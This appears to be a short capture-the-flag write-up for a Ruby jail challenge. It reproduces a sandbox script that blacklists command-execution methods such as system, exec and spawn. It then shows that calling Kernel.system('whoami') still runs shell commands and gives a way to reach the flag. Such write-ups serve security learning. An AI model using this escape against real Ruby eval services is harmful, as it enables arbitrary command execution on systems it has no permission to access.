Simple ruby jail challenge with a failing blacklist that deletes common methods that allow for arbitrary command execution.
Challenge Description
Points
200
Description
There are many python jail challenges in CTFs.
Let's try to break something new!
The flag is located at ./flag.
nc 54.255.188.183 7411
Solvers
4 Teams solved
Solution
We are given a ruby jail:
#!/usr/bin/env ruby
$stdout.sync = true
def ban(m, blacklist)
m.module_eval do
blacklist.each do |meth|
send(:remove_const, meth) rescue nil
define_method(meth) do |*|
raise "No Hack No Life :P (#{meth})"
end
end
end
end
ban(Kernel, %i(` exec fork load open spawn syscall system))
ban(Object, %i(Dir File IO ObjectSpace Process Thread class))
loop do
print '> '
line = $stdin.gets
break if line.nil?
begin
p eval(line, TOPLEVEL_BINDING)
rescue Exception => e
puts e
end
end
Even though it says that Kernel.system is supposed to be blacklisted, it does
not seem to work.
$ ruby a9463878cec7f509bb79017455f31293_jail.rb
> Kernel.system("whoami")
ubuntu
true
> Kernel.system("ls")
a9463878cec7f509bb79017455f31293_jail.rb jail.rb
true
>
Thus, we can get the flag with the new shell access we have.
Leave a Comment